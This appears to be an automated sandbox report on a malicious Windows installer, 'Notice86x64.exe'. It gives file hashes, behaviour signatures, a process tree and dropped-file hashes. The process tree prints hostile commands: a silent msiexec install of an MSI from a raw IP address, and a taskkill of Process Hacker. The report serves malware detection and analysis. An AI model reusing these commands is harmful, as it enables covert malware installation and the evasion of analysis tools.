Analysis
-
max time kernel
69s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
25/05/2023, 13:09
Static task
static1
Behavioral task
behavioral1
Sample
Notice86x64.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Notice86x64.exe
Resource
win10v2004-20230220-en
General
-
Target
Notice86x64.exe
-
Size
6.9MB
-
MD5
bd294af66e42c317ff4bde406043e918
-
SHA1
c508e4ca273dffca5966cb41f13ec3bb78034108
-
SHA256
4645c34b63cfe2e839c31994ae00756b38bae0212aceaa8875d69c176e14de3c
-
SHA512
1e66e6599a6d0b1d9ef1426349bb69e0379997f7d6fbc8f518033062d617af86588c668a8a29841798df2f87566f28834651b9cc57af6e1951eeda432b3fa357
-
SSDEEP
98304:qSipzN7QKKSW+Aic8vBquYafPwy46kubjHZDMRpSwme6K8VrpPobS+I4:qaSW+Aic8ZqRawhubTiX0etc+I4
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 27 4376 msiexec.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation Notice86x64.tmp Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation Notice86x64.tmp -
Executes dropped EXE 3 IoCs
pid Process 3276 Notice86x64.tmp 3124 Notice86x64.tmp 4172 x64_t.exe -
Loads dropped DLL 2 IoCs
pid Process 1388 MsiExec.exe 1388 MsiExec.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 2056 ICACLS.EXE 1788 ICACLS.EXE -
Use of msiexec (install) with remote resource 1 IoCs
pid Process 5044 msiexec.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 ip-api.com -
Drops file in Windows directory 9 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSIAC90.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIB6C3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC4BE.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\LOGS\DPX\setupact.log EXPAND.EXE File opened for modification C:\Windows\LOGS\DPX\setuperr.log EXPAND.EXE File opened for modification C:\Windows\Installer\MSIC4CF.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 1 IoCs
pid Process 1496 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings calc.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4376 msiexec.exe 4376 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 41 IoCs
description pid Process Token: SeDebugPrivilege 1496 taskkill.exe Token: SeShutdownPrivilege 5044 msiexec.exe Token: SeIncreaseQuotaPrivilege 5044 msiexec.exe Token: SeSecurityPrivilege 4376 msiexec.exe Token: SeCreateTokenPrivilege 5044 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 5044 msiexec.exe Token: SeLockMemoryPrivilege 5044 msiexec.exe Token: SeIncreaseQuotaPrivilege 5044 msiexec.exe Token: SeMachineAccountPrivilege 5044 msiexec.exe Token: SeTcbPrivilege 5044 msiexec.exe Token: SeSecurityPrivilege 5044 msiexec.exe Token: SeTakeOwnershipPrivilege 5044 msiexec.exe Token: SeLoadDriverPrivilege 5044 msiexec.exe Token: SeSystemProfilePrivilege 5044 msiexec.exe Token: SeSystemtimePrivilege 5044 msiexec.exe Token: SeProfSingleProcessPrivilege 5044 msiexec.exe Token: SeIncBasePriorityPrivilege 5044 msiexec.exe Token: SeCreatePagefilePrivilege 5044 msiexec.exe Token: SeCreatePermanentPrivilege 5044 msiexec.exe Token: SeBackupPrivilege 5044 msiexec.exe Token: SeRestorePrivilege 5044 msiexec.exe Token: SeShutdownPrivilege 5044 msiexec.exe Token: SeDebugPrivilege 5044 msiexec.exe Token: SeAuditPrivilege 5044 msiexec.exe Token: SeSystemEnvironmentPrivilege 5044 msiexec.exe Token: SeChangeNotifyPrivilege 5044 msiexec.exe Token: SeRemoteShutdownPrivilege 5044 msiexec.exe Token: SeUndockPrivilege 5044 msiexec.exe Token: SeSyncAgentPrivilege 5044 msiexec.exe Token: SeEnableDelegationPrivilege 5044 msiexec.exe Token: SeManageVolumePrivilege 5044 msiexec.exe Token: SeImpersonatePrivilege 5044 msiexec.exe Token: SeCreateGlobalPrivilege 5044 msiexec.exe Token: SeRestorePrivilege 4376 msiexec.exe Token: SeTakeOwnershipPrivilege 4376 msiexec.exe Token: SeRestorePrivilege 4376 msiexec.exe Token: SeTakeOwnershipPrivilege 4376 msiexec.exe Token: SeRestorePrivilege 4376 msiexec.exe Token: SeTakeOwnershipPrivilege 4376 msiexec.exe Token: SeRestorePrivilege 4376 msiexec.exe Token: SeTakeOwnershipPrivilege 4376 msiexec.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3124 Notice86x64.tmp -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1312 OpenWith.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 3340 wrote to memory of 3276 3340 Notice86x64.exe 84 PID 3340 wrote to memory of 3276 3340 Notice86x64.exe 84 PID 3340 wrote to memory of 3276 3340 Notice86x64.exe 84 PID 3276 wrote to memory of 3132 3276 Notice86x64.tmp 85 PID 3276 wrote to memory of 3132 3276 Notice86x64.tmp 85 PID 3276 wrote to memory of 3132 3276 Notice86x64.tmp 85 PID 3276 wrote to memory of 2220 3276 Notice86x64.tmp 87 PID 3276 wrote to memory of 2220 3276 Notice86x64.tmp 87 PID 3276 wrote to memory of 2220 3276 Notice86x64.tmp 87 PID 3132 wrote to memory of 1496 3132 cmd.exe 88 PID 3132 wrote to memory of 1496 3132 cmd.exe 88 PID 3132 wrote to memory of 1496 3132 cmd.exe 88 PID 2220 wrote to memory of 3124 2220 Notice86x64.exe 89 PID 2220 wrote to memory of 3124 2220 Notice86x64.exe 89 PID 2220 wrote to memory of 3124 2220 Notice86x64.exe 89 PID 3124 wrote to memory of 5044 3124 Notice86x64.tmp 90 PID 3124 wrote to memory of 5044 3124 Notice86x64.tmp 90 PID 3124 wrote to memory of 5044 3124 Notice86x64.tmp 90 PID 3124 wrote to memory of 4392 3124 Notice86x64.tmp 91 PID 3124 wrote to memory of 4392 3124 Notice86x64.tmp 91 PID 3124 wrote to memory of 4392 3124 Notice86x64.tmp 91 PID 4376 wrote to memory of 1388 4376 msiexec.exe 98 PID 4376 wrote to memory of 1388 4376 msiexec.exe 98 PID 4376 wrote to memory of 1388 4376 msiexec.exe 98 PID 1388 wrote to memory of 2056 1388 MsiExec.exe 100 PID 1388 wrote to memory of 2056 1388 MsiExec.exe 100 PID 1388 wrote to memory of 2056 1388 MsiExec.exe 100 PID 1388 wrote to memory of 4776 1388 MsiExec.exe 102 PID 1388 wrote to memory of 4776 1388 MsiExec.exe 102 PID 1388 wrote to memory of 4776 1388 MsiExec.exe 102 PID 1388 wrote to memory of 4172 1388 MsiExec.exe 104 PID 1388 wrote to memory of 4172 1388 MsiExec.exe 104 PID 4172 wrote to memory of 4460 4172 x64_t.exe 105 PID 4172 wrote to memory of 4460 4172 x64_t.exe 105 PID 4172 wrote to memory of 4460 4172 x64_t.exe 105 PID 1388 wrote to memory of 1788 1388 MsiExec.exe 106 PID 1388 wrote to memory of 1788 1388 MsiExec.exe 106 PID 1388 wrote to memory of 1788 1388 MsiExec.exe 106
Processes
-
C:\Users\Admin\AppData\Local\Temp\Notice86x64.exe"C:\Users\Admin\AppData\Local\Temp\Notice86x64.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Users\Admin\AppData\Local\Temp\is-QI2UK.tmp\Notice86x64.tmp"C:\Users\Admin\AppData\Local\Temp\is-QI2UK.tmp\Notice86x64.tmp" /SL5="$A014C,991232,991232,C:\Users\Admin\AppData\Local\Temp\Notice86x64.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3276 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im processhacker.exe /f3⤵
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im processhacker.exe /f4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
-
C:\Users\Admin\AppData\Local\Temp\Notice86x64.exe"C:\Users\Admin\AppData\Local\Temp\Notice86x64.exe" /verysilent /sp-3⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Users\Admin\AppData\Local\Temp\is-4HNK7.tmp\Notice86x64.tmp"C:\Users\Admin\AppData\Local\Temp\is-4HNK7.tmp\Notice86x64.tmp" /SL5="$B014C,991232,991232,C:\Users\Admin\AppData\Local\Temp\Notice86x64.exe" /verysilent /sp-4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /qn /i http://94.142.138.14/tit/driv.msi5⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\dl.cmd""5⤵PID:4392
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 5E7521729E50998D543B2661F48EB6B02⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\SysWOW64\ICACLS.EXE"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-6ed4a302-be20-46f4-9909-72b8ffcaac1f\." /SETINTEGRITYLEVEL (CI)(OI)HIGH3⤵
- Modifies file permissions
PID:2056
-
-
C:\Windows\SysWOW64\EXPAND.EXE"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files3⤵
- Drops file in Windows directory
PID:4776
-
-
C:\Users\Admin\AppData\Local\Temp\MW-6ed4a302-be20-46f4-9909-72b8ffcaac1f\files\x64_t.exe"C:\Users\Admin\AppData\Local\Temp\MW-6ed4a302-be20-46f4-9909-72b8ffcaac1f\files\x64_t.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\Windows\SysWOW64\calc.execalc.exe4⤵
- Modifies registry class
PID:4460
-
-
-
C:\Windows\SysWOW64\ICACLS.EXE"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-6ed4a302-be20-46f4-9909-72b8ffcaac1f\." /SETINTEGRITYLEVEL (CI)(OI)LOW3⤵
- Modifies file permissions
PID:1788
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:1312
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.1MB
MD58a28b0f498da8ce64e49c0d565723e6c
SHA13b9a9e091b3ded7aee959b154418a44380585f82
SHA2561f37853be7f3057c64d3b15e323ee7f9a71390403ecab8f830b6be383dc34241
SHA512f02fbae3514a213af48a25b6c1a183fecfef08f14f50650a5b1a12c26e37a30675d8e541371bd7291b46a0a1b82e9133ea05f8b0cec8d8edf925099bf6a75f89
-
Filesize
6.1MB
MD59a3bad7d8516216695887acc9668cda1
SHA1a89c097138e5aab1f35b9a03900600057d907690
SHA2564862618fcf15ba4ad15df35a8dcb0bdb79647b455fea6c6937c7d050815494b0
SHA512be94a916846edd622034283852e8b5539b1057f5de2bc30772f4541e90f3fa03992104261f27b78efe0b6bb8880cb3aaba0e2e59e16b85883469dc5a0cddda37
-
Filesize
6.1MB
MD59a3bad7d8516216695887acc9668cda1
SHA1a89c097138e5aab1f35b9a03900600057d907690
SHA2564862618fcf15ba4ad15df35a8dcb0bdb79647b455fea6c6937c7d050815494b0
SHA512be94a916846edd622034283852e8b5539b1057f5de2bc30772f4541e90f3fa03992104261f27b78efe0b6bb8880cb3aaba0e2e59e16b85883469dc5a0cddda37
-
Filesize
1KB
MD50caee4e7965db6400911dcc68c7990df
SHA1ae127df4dfe499fb46984109e14caab2454faa84
SHA25672941c2ccd686753c6d78a942d2952bf6ebd3ab58e5e15aac9b4be2a9f91e3e5
SHA5129b94b81987faed34f3da4caa89ec7d5f0ab954125fb5d82559100b5e2b133dd434a689664ab5c8f962b8898169abf546f93253042296f63ce68eef92e753a590
-
Filesize
1KB
MD5dbb0f27c88049066f0a094f46002d636
SHA1003824892f699e90d6f7b631e765718d519ef1cf
SHA2561b274247c8dc22fa93f4a6a8907ab885875fdadee4eeaa91ae55f2f58ec78ea7
SHA5120e912565c2a605413440fed8d6b2ce41a22d316e1f81d6d3822d892ec77f4be3b3d34af5a4c3e2d7b8019613255cea43835778cc73bf949f1b9476c4abf52ebc
-
Filesize
1KB
MD5dbb0f27c88049066f0a094f46002d636
SHA1003824892f699e90d6f7b631e765718d519ef1cf
SHA2561b274247c8dc22fa93f4a6a8907ab885875fdadee4eeaa91ae55f2f58ec78ea7
SHA5120e912565c2a605413440fed8d6b2ce41a22d316e1f81d6d3822d892ec77f4be3b3d34af5a4c3e2d7b8019613255cea43835778cc73bf949f1b9476c4abf52ebc
-
Filesize
1KB
MD53b5a724977dcec0997fdc7b5d90a0934
SHA196797316f68fbaa97c9a127ab6f91607c954bac0
SHA25658ae0b500d1675c8530164f2271c9ed68e64a70e5beb7ca87eee8713a94cd5f6
SHA51266a3031fb4499c64ebfdfea607170bf0034b8dbdfe01dde5d4895ff57634d58ca16d6e489eaccf0b4fb28a4a0563a2943b3386e33a49a8ba0852c2683cb9ace2
-
Filesize
144B
MD5ecb0fdb16b35747e7f77642c4c4a8520
SHA157b93f1ff87b0d46846f316dbb2754a6ba18d60d
SHA2564a268df350447ea28f13d8b307dc3f70d1a5ca85c75673e95c8a3dafd9f2ea16
SHA512293baa8858a7635a679dd820fca2c054f41e7d9498d69eca07707c47083d31f3e07a392c9b2c6535e79a2cf82a6d293b549447433b3a44d0dcc9dbe10dc80218
-
Filesize
3.1MB
MD5655b822ebcb631eaeb14b90aac2a4a5d
SHA18d18301d578769bf8316733a95176dc117e2d278
SHA25663a18a443c7b6489b4aaf393b2b3369ef9597a50834f90a844de1005d845d487
SHA5126d09140eb8329eeb8de5d67055d2234689685156fc302e77707490a8d2c10ae49582bfe31c5e358d2d3d4859e0f4babab5a74461abb8d9351c0b6cf52792c49f
-
Filesize
3.1MB
MD5655b822ebcb631eaeb14b90aac2a4a5d
SHA18d18301d578769bf8316733a95176dc117e2d278
SHA25663a18a443c7b6489b4aaf393b2b3369ef9597a50834f90a844de1005d845d487
SHA5126d09140eb8329eeb8de5d67055d2234689685156fc302e77707490a8d2c10ae49582bfe31c5e358d2d3d4859e0f4babab5a74461abb8d9351c0b6cf52792c49f
-
Filesize
6.5MB
MD5b145881a72eb895a237945b6f37f87b3
SHA1d7a075762597df5984bbdfd47808d4e13776fe17
SHA256394a101a13792aa062a2f8dbb7f8f1cc2b7b5e9ea0fc0e57f40197dfc525639a
SHA51287c2663e5022aedd9baf4b8b0f45e4c1d86cdde16bb81ac766d0a7515a2870381a41e8cd2ca2f16c141e6c716a3c4d233b6692a082bc109414056c69fdcc3b48
-
Filesize
208KB
MD5d82b3fb861129c5d71f0cd2874f97216
SHA1f3fe341d79224126e950d2691d574d147102b18d
SHA256107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c
SHA512244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b
-
Filesize
208KB
MD5d82b3fb861129c5d71f0cd2874f97216
SHA1f3fe341d79224126e950d2691d574d147102b18d
SHA256107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c
SHA512244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b
-
Filesize
208KB
MD5d82b3fb861129c5d71f0cd2874f97216
SHA1f3fe341d79224126e950d2691d574d147102b18d
SHA256107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c
SHA512244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b
-
Filesize
208KB
MD5d82b3fb861129c5d71f0cd2874f97216
SHA1f3fe341d79224126e950d2691d574d147102b18d
SHA256107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c
SHA512244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b